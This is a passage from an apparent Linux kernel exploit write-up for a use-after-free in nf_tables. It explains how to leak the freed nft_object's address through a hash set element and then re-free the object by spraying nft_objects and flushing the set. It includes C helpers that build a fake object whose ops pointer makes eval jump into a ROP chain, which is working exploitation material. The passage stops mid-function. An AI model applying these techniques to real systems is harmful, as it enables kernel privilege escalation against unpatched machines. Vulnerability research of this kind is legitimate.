        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_object_ops</span>     <span class="o">*</span><span class="n">ops</span> <span class="n">____cacheline_aligned</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="kt">unsigned</span> <span class="kt">char</span>           <span class="n">data</span><span class="p">[]</span>
                <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_object_ops</span> <span class="p">{</span>
        <span class="kt">void</span>                    <span class="p">(</span><span class="o">*</span><span class="n">eval</span><span class="p">)(</span><span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
                                        <span class="k">struct</span> <span class="n">nft_regs</span> <span class="o">*</span><span class="n">regs</span><span class="p">,</span>
                                        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_pktinfo</span> <span class="o">*</span><span class="n">pkt</span><span class="p">);</span>
        <span class="kt">unsigned</span> <span class="kt">int</span>            <span class="n">size</span><span class="p">;</span>
        <span class="kt">int</span>                     <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                        <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="k">const</span> <span class="n">tb</span><span class="p">[],</span>
                                        <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">);</span>
        <span class="kt">void</span>                    <span class="p">(</span><span class="o">*</span><span class="n">destroy</span><span class="p">)(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                                           <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">);</span>
        <span class="kt">int</span>                     <span class="p">(</span><span class="o">*</span><span class="n">dump</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                        <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">,</span>
                                        <span class="n">bool</span> <span class="n">reset</span><span class="p">);</span>
        <span class="kt">void</span>                    <span class="p">(</span><span class="o">*</span><span class="n">update</span><span class="p">)(</span><span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">obj</span><span class="p">,</span>
                                          <span class="k">struct</span> <span class="n">nft_object</span> <span class="o">*</span><span class="n">newobj</span><span class="p">);</span>
        <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_object_type</span>    <span class="o">*</span><span class="n">type</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
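<p>The resulting layout of the replacement data can be sketched in user space as below. The offset 128 comes from the text; the slot size of 256 bytes and the helper names are assumptions for illustration, and <code class="language-plaintext highlighter-rouge">resolve_eval</code> merely mirrors the two loads performed by <code class="language-plaintext highlighter-rouge">obj-&gt;ops-&gt;eval</code> on the buffer instead of calling anything.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SLOT_SIZE   256  /* hypothetical size of the reclaimed slot */
#define OPS_OFFSET  128  /* offset of nft_object->ops (from the text) */

/*
 * Build the data that replaces the freed nft_object:
 *   [0, 128)  payload qwords (the first one is what gets fetched as eval)
 *   [128]     fake ops pointer, pointing back at the slot itself
 * slot_addr is the leaked kernel address of the freed object.
 */
static void build_fake_object(uint8_t slot[SLOT_SIZE], uint64_t slot_addr,
                              const uint64_t *payload, size_t n)
{
    assert(n * sizeof(uint64_t) <= OPS_OFFSET);
    memset(slot, 0, SLOT_SIZE);
    memcpy(slot, payload, n * sizeof(uint64_t));
    memcpy(slot + OPS_OFFSET, &slot_addr, sizeof(slot_addr));
}

/* Mirror obj->ops->eval: load ops at +128, then load eval at ops + 0. */
static uint64_t resolve_eval(const uint8_t slot[SLOT_SIZE], uint64_t slot_addr)
{
    uint64_t ops, eval;

    memcpy(&ops, slot + OPS_OFFSET, sizeof(ops));
    /* This sketch only handles a fake ops that points inside the slot. */
    assert(ops >= slot_addr && ops - slot_addr <= SLOT_SIZE - sizeof(eval));
    memcpy(&eval, slot + (ops - slot_addr), sizeof(eval));
    return eval;
}
```

<p>Because the fake <code class="language-plaintext highlighter-rouge">ops</code> pointer refers back to the start of the slot, the value fetched as <code class="language-plaintext highlighter-rouge">eval</code> is simply the first qword of the payload.</p>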

<p>Consequently, the address of the start of our ROP chain is just the base address of the freed <code class="language-plaintext highlighter-rouge">nft_object</code>, which we now have to leak. Since the anonymous <code class="language-plaintext highlighter-rouge">nft_set</code> has a reference to the freed <code class="language-plaintext highlighter-rouge">nft_object</code> through its <code class="language-plaintext highlighter-rouge">nft_set_elem</code>, we can just leak the address of the freed memory location from the <code class="language-plaintext highlighter-rouge">nft_set_elem</code>. As mentioned earlier, our anonymous <code class="language-plaintext highlighter-rouge">nft_set</code> has type <code class="language-plaintext highlighter-rouge">nft_set_hash_type</code> and has space reserved [1] for a <code class="language-plaintext highlighter-rouge">struct nft_hash</code> plus the linked list heads for its hash buckets [2].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_newset</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
			    <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">ops</span> <span class="o">=</span> <span class="n">nft_select_set_ops</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">nla</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">desc</span><span class="p">,</span> <span class="n">policy</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">ops</span><span class="p">))</span>
		<span class="k">return</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">ops</span><span class="p">);</span>

	<span class="n">udlen</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_USERDATA</span><span class="p">])</span>
		<span class="n">udlen</span> <span class="o">=</span> <span class="n">nla_len</span><span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_USERDATA</span><span class="p">]);</span>

	<span class="n">size</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">privsize</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span>
		<span class="n">size</span> <span class="o">=</span> <span class="n">ops</span><span class="o">-&gt;</span><span class="n">privsize</span><span class="p">(</span><span class="n">nla</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">desc</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
	<span class="n">alloc_size</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">set</span><span class="p">)</span> <span class="o">+</span> <span class="n">size</span> <span class="o">+</span> <span class="n">udlen</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">alloc_size</span> <span class="o">&lt;</span> <span class="n">size</span> <span class="o">||</span> <span class="n">alloc_size</span> <span class="o">&gt;</span> <span class="n">INT_MAX</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>
	<span class="n">set</span> <span class="o">=</span> <span class="n">kvzalloc</span><span class="p">(</span><span class="n">alloc_size</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
        <span class="p">...</span>
<span class="p">}</span>

<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_type</span> <span class="n">nft_set_hash_type</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">features</span>	<span class="o">=</span> <span class="n">NFT_SET_MAP</span> <span class="o">|</span> <span class="n">NFT_SET_OBJECT</span><span class="p">,</span>
	<span class="p">.</span><span class="n">ops</span>		<span class="o">=</span> <span class="p">{</span>
		<span class="p">.</span><span class="n">privsize</span>       <span class="o">=</span> <span class="n">nft_hash_privsize</span><span class="p">,</span>
		<span class="p">...</span>
	<span class="p">},</span>
<span class="p">};</span>

<span class="k">static</span> <span class="n">u64</span> <span class="nf">nft_hash_privsize</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[],</span>
			     <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_desc</span> <span class="o">*</span><span class="n">desc</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">return</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_hash</span><span class="p">)</span> <span class="o">+</span>
	       <span class="p">(</span><span class="n">u64</span><span class="p">)</span><span class="n">nft_hash_buckets</span><span class="p">(</span><span class="n">desc</span><span class="o">-&gt;</span><span class="n">size</span><span class="p">)</span> <span class="o">*</span> <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">hlist_head</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">struct nft_hash</code> trails the <code class="language-plaintext highlighter-rouge">struct nft_set</code> and has a table member [1], the hash table that holds the <code class="language-plaintext highlighter-rouge">nft_set_elem</code>s of that set. Each index of the table contains a <code class="language-plaintext highlighter-rouge">struct hlist_head</code>, the head of a linked list of the set elems that were hashed into that index. A <code class="language-plaintext highlighter-rouge">struct hlist_head</code> contains just a pointer to a <code class="language-plaintext highlighter-rouge">struct hlist_node</code>, which is both a node in the linked list and a member of a <code class="language-plaintext highlighter-rouge">struct nft_hash_elem</code> [2]. For hash type sets, a pointer to the <code class="language-plaintext highlighter-rouge">nft_hash_elem</code> is stored as the <code class="language-plaintext highlighter-rouge">priv</code> member of an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> [3]. In short, the set elem within our set is an <code class="language-plaintext highlighter-rouge">nft_set_elem</code> whose <code class="language-plaintext highlighter-rouge">priv</code> points to an <code class="language-plaintext highlighter-rouge">nft_hash_elem</code>, whose <code class="language-plaintext highlighter-rouge">node</code> member is linked into one of the lists of the set’s hash table. If such a set elem is created with an object reference, a pointer to the object is stored within the <code class="language-plaintext highlighter-rouge">ext</code> member of the elem [4].
The memory layout of the <code class="language-plaintext highlighter-rouge">nft_set</code> of type <code class="language-plaintext highlighter-rouge">nft_set_hash_type</code> is illustrated in the diagram following the function and struct definitions below.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_hash</span> <span class="p">{</span>
	<span class="n">u32</span>				<span class="n">seed</span><span class="p">;</span>
	<span class="n">u32</span>				<span class="n">buckets</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">hlist_head</span>		<span class="n">table</span><span class="p">[];</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">hlist_head</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">hlist_node</span> <span class="o">*</span><span class="n">first</span><span class="p">;</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">hlist_node</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">hlist_node</span> <span class="o">*</span><span class="n">next</span><span class="p">,</span> <span class="o">**</span><span class="n">pprev</span><span class="p">;</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_hash_elem</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">hlist_node</span>       <span class="n">node</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="k">struct</span> <span class="n">nft_set_ext</span>      <span class="n">ext</span><span class="p">;</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_set_elem</span> <span class="p">{</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u32</span>		<span class="n">buf</span><span class="p">[</span><span class="n">NFT_DATA_VALUE_MAXLEN</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">)];</span>
		<span class="k">struct</span> <span class="n">nft_data</span>	<span class="n">val</span><span class="p">;</span>
	<span class="p">}</span> <span class="n">key</span><span class="p">;</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u32</span>		<span class="n">buf</span><span class="p">[</span><span class="n">NFT_DATA_VALUE_MAXLEN</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">)];</span>
		<span class="k">struct</span> <span class="n">nft_data</span>	<span class="n">val</span><span class="p">;</span>
	<span class="p">}</span> <span class="n">key_end</span><span class="p">;</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">u32</span>		<span class="n">buf</span><span class="p">[</span><span class="n">NFT_DATA_VALUE_MAXLEN</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">u32</span><span class="p">)];</span>
		<span class="k">struct</span> <span class="n">nft_data</span> <span class="n">val</span><span class="p">;</span>
	<span class="p">}</span> <span class="n">data</span><span class="p">;</span>
	<span class="kt">void</span>			<span class="o">*</span><span class="n">priv</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
<span class="p">};</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_add_set_elem</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
			    <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">,</span> <span class="n">u32</span> <span class="n">nlmsg_flags</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">]</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">obj</span> <span class="o">=</span> <span class="n">nft_obj_lookup</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">table</span><span class="p">,</span>
				     <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_OBJREF</span><span class="p">],</span>
				     <span class="n">set</span><span class="o">-&gt;</span><span class="n">objtype</span><span class="p">,</span> <span class="n">genmask</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="p">...</span>
        <span class="n">ext</span> <span class="o">=</span> <span class="n">nft_set_elem_ext</span><span class="p">(</span><span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="p">.</span><span class="n">priv</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">obj</span><span class="p">)</span> <span class="p">{</span>
		<span class="o">*</span><span class="n">nft_set_ext_obj</span><span class="p">(</span><span class="n">ext</span><span class="p">)</span> <span class="o">=</span> <span class="n">obj</span><span class="p">;</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">4</span><span class="p">]</span>
		<span class="n">obj</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>
	<span class="p">}</span>
        <span class="p">...</span>
<span class="p">}</span>
</code></pre></div></div>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>+ ---------------------------------------------------------------------------------------------- +
| + -------------- + | + --------------------------------------------------------------------- + |
| | struct nft_set | | | struct nft_hash:  u32 seed | u32 buckets | struct hlist_head table[ ] | |
| + -------------- + | + --------------------------------------------------------------------- + |
+ ---------------------------------------------------------------------------------------------- +
</code></pre></div></div>

<p>We only have one <code class="language-plaintext highlighter-rouge">nft_set_elem</code> in our set. To make its <code class="language-plaintext highlighter-rouge">node</code> member easy to find within the set’s hash table, we ensure the table contains only one linked list (i.e. one hash bucket), which is controllable when creating the set. As a result, the <code class="language-plaintext highlighter-rouge">node</code> of our set elem can be found in the linked list at index 0 of the set’s hash table. Since that list contains only one entry (we created only one set elem successfully), we can leak the address of the <code class="language-plaintext highlighter-rouge">node</code> member of the <code class="language-plaintext highlighter-rouge">nft_hash_elem</code> by applying our read primitive to the address of the hash table (a <code class="language-plaintext highlighter-rouge">struct hlist_head</code>), which simply holds a pointer to the first <code class="language-plaintext highlighter-rouge">hlist_node</code>. With the address of the set elem’s <code class="language-plaintext highlighter-rouge">hlist_node</code>, we can then leak the freed <code class="language-plaintext highlighter-rouge">nft_object</code>’s address, since the pointer to it is stored within the <code class="language-plaintext highlighter-rouge">nft_set_ext</code> that follows the <code class="language-plaintext highlighter-rouge">hlist_node</code> inside the <code class="language-plaintext highlighter-rouge">nft_hash_elem</code>. We just need to compute the appropriate offset from the <code class="language-plaintext highlighter-rouge">hlist_node</code> to the <code class="language-plaintext highlighter-rouge">nft_object</code> pointer within the <code class="language-plaintext highlighter-rouge">nft_set_ext</code>.
With the leaked address, we now know where the <code class="language-plaintext highlighter-rouge">eval</code> function pointer needs to point.</p>
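<p>The offset arithmetic described above can be sketched as follows. This is a minimal userspace illustration rather than the code used in the exploit: the mirror structs, the helper names and the two <code class="language-plaintext highlighter-rouge">NFT_SET_EXT_*</code> values are assumptions based on a 5.15-era x86-64 layout and should be checked against the target kernel build. It assumes the per-element <code class="language-plaintext highlighter-rouge">offset[]</code> byte for the objref extension is read back with the same read primitive.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;

/* Assumed values of enum nft_set_extensions for a 5.15-era kernel. */
#define NFT_SET_EXT_OBJREF 8
#define NFT_SET_EXT_NUM    9

/* Hypothetical userspace mirrors of the kernel structs (x86-64 layout). */
struct hlist_node_m {
        uint64_t next;
        uint64_t pprev;
};

struct nft_set_ext_m {
        uint8_t genmask;
        uint8_t offset[NFT_SET_EXT_NUM]; /* per-extension byte offsets from ext */
};

struct nft_hash_elem_m {
        struct hlist_node_m node;
        struct nft_set_ext_m ext;
};

/* Address of the ext-&gt;offset[NFT_SET_EXT_OBJREF] byte, given the leaked node. */
uint64_t objref_offset_byte_addr(uint64_t node_addr)
{
        return node_addr + offsetof(struct nft_hash_elem_m, ext)
                         + offsetof(struct nft_set_ext_m, offset)
                         + NFT_SET_EXT_OBJREF;
}

/* Address of the slot that stores the nft_object pointer. */
uint64_t objref_slot_addr(uint64_t node_addr, uint8_t objref_off)
{
        uint64_t ext_addr = node_addr + offsetof(struct nft_hash_elem_m, ext);

        return ext_addr + objref_off;
}
</code></pre></div></div>

<p>Reading the byte at <code class="language-plaintext highlighter-rouge">objref_offset_byte_addr(node)</code> gives the extension offset, and reading 8 bytes at <code class="language-plaintext highlighter-rouge">objref_slot_addr(node, off)</code> then gives the stale <code class="language-plaintext highlighter-rouge">nft_object</code> pointer. Hard-coding the offset for a known target would work equally well.</p>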

<h3 id="creating-an-objref-expression-trigger-for-rop">Creating an objref expression trigger for ROP</h3>

<p>The next step is to create an <code class="language-plaintext highlighter-rouge">objref</code> expression to an <code class="language-plaintext highlighter-rouge">nft_object</code> that fills the UAF slot; that object is then freed and replaced with arbitrary data. We perform a heap spray of <code class="language-plaintext highlighter-rouge">nft_object</code>s, find out which object was allocated into the previously freed memory location, create an <code class="language-plaintext highlighter-rouge">objref</code> expression to that particular object and finally destroy the <code class="language-plaintext highlighter-rouge">nft_object</code> again, while the <code class="language-plaintext highlighter-rouge">objref</code> continues to hold a pointer to it. The issue here is that after creating an <code class="language-plaintext highlighter-rouge">objref</code> that holds a pointer to it, the object has use = 1 (use is the reference count for <code class="language-plaintext highlighter-rouge">nft_object</code>s), so it cannot be deleted directly by sending a netlink message of type <code class="language-plaintext highlighter-rouge">NFT_MSG_DELOBJ</code>. However, this new object that we formed the <code class="language-plaintext highlighter-rouge">objref</code> expression to now lies in the UAF slot, and the <code class="language-plaintext highlighter-rouge">nft_set_elem</code> in our anonymous set still mistakenly assumes it’s holding a valid pointer to an <code class="language-plaintext highlighter-rouge">nft_object</code> there.
When we delete this set elem from the set without specifying the exact set elem to delete, <code class="language-plaintext highlighter-rouge">nf_tables_delsetelem</code> is called, which calls <code class="language-plaintext highlighter-rouge">nft_set_flush</code> [1], and this in turn calls <code class="language-plaintext highlighter-rouge">nft_setelem_flush</code> [2] for every set elem in the set. <code class="language-plaintext highlighter-rouge">nft_setelem_flush</code> invokes <code class="language-plaintext highlighter-rouge">nft_setelem_data_deactivate</code> [3], which decrements the use count of the <code class="language-plaintext highlighter-rouge">nft_object</code> it is referencing [4].</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">nf_tables_delsetelem</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nfnl_info</span> <span class="o">*</span><span class="n">info</span><span class="p">,</span>
                                <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span> <span class="k">const</span> <span class="n">nla</span><span class="p">[])</span>
<span class="p">{</span>
        <span class="p">...</span>
        <span class="n">table</span> <span class="o">=</span> <span class="n">nft_table_lookup</span><span class="p">(</span><span class="n">net</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_TABLE</span><span class="p">],</span> <span class="n">family</span><span class="p">,</span>
                                 <span class="n">genmask</span><span class="p">,</span> <span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="n">set</span> <span class="o">=</span> <span class="n">nft_set_lookup</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_SET</span><span class="p">],</span> <span class="n">genmask</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
                <span class="k">return</span> <span class="n">PTR_ERR</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
        <span class="p">...</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_ELEMENTS</span><span class="p">])</span>
                <span class="k">return</span> <span class="n">nft_set_flush</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">genmask</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">1</span><span class="p">]</span>

        <span class="n">nla_for_each_nested</span><span class="p">(</span><span class="n">attr</span><span class="p">,</span> <span class="n">nla</span><span class="p">[</span><span class="n">NFTA_SET_ELEM_LIST_ELEMENTS</span><span class="p">],</span> <span class="n">rem</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="n">nft_del_setelem</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span>
                <span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
                        <span class="k">break</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_set_flush</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span> <span class="n">u8</span> <span class="n">genmask</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_set_iter</span> <span class="n">iter</span> <span class="o">=</span> <span class="p">{</span>
                <span class="p">.</span><span class="n">genmask</span>        <span class="o">=</span> <span class="n">genmask</span><span class="p">,</span>
                <span class="p">.</span><span class="n">fn</span>             <span class="o">=</span> <span class="n">nft_setelem_flush</span><span class="p">,</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="c1">// called for each elem in set-&gt;ops-&gt;walk</span>
        <span class="p">};</span>

        <span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">walk</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">iter</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">iter</span><span class="p">.</span><span class="n">err</span><span class="p">)</span>
                <span class="n">iter</span><span class="p">.</span><span class="n">err</span> <span class="o">=</span> <span class="n">nft_set_catchall_flush</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>

        <span class="k">return</span> <span class="n">iter</span><span class="p">.</span><span class="n">err</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">int</span> <span class="nf">nft_setelem_flush</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                             <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                             <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set_iter</span> <span class="o">*</span><span class="n">iter</span><span class="p">,</span>
                             <span class="k">struct</span> <span class="n">nft_set_elem</span> <span class="o">*</span><span class="n">elem</span><span class="p">)</span>
<span class="p">{</span>
        <span class="k">struct</span> <span class="n">nft_trans</span> <span class="o">*</span><span class="n">trans</span><span class="p">;</span>
        <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

        <span class="n">trans</span> <span class="o">=</span> <span class="n">nft_trans_alloc_gfp</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">NFT_MSG_DELSETELEM</span><span class="p">,</span>
                                    <span class="k">sizeof</span><span class="p">(</span><span class="k">struct</span> <span class="n">nft_trans_elem</span><span class="p">),</span> <span class="n">GFP_ATOMIC</span><span class="p">);</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">trans</span><span class="p">)</span>
                <span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">flush</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="o">-&gt;</span><span class="n">priv</span><span class="p">))</span> <span class="p">{</span>
                <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
                <span class="k">goto</span> <span class="n">err1</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">set</span><span class="o">-&gt;</span><span class="n">ndeact</span><span class="o">++</span><span class="p">;</span>

        <span class="n">nft_setelem_data_deactivate</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">set</span><span class="p">,</span> <span class="n">elem</span><span class="p">);</span>    <span class="o">&lt;---</span> <span class="p">[</span><span class="mi">3</span><span class="p">]</span>
        <span class="n">nft_trans_elem_set</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="n">set</span><span class="p">;</span>
        <span class="n">nft_trans_elem</span><span class="p">(</span><span class="n">trans</span><span class="p">)</span> <span class="o">=</span> <span class="o">*</span><span class="n">elem</span><span class="p">;</span>
        <span class="n">nft_trans_commit_list_add_tail</span><span class="p">(</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">net</span><span class="p">,</span> <span class="n">trans</span><span class="p">);</span>

        <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="nl">err1:</span>
        <span class="n">kfree</span><span class="p">(</span><span class="n">trans</span><span class="p">);</span>
        <span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_setelem_data_deactivate</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">net</span> <span class="o">*</span><span class="n">net</span><span class="p">,</span>
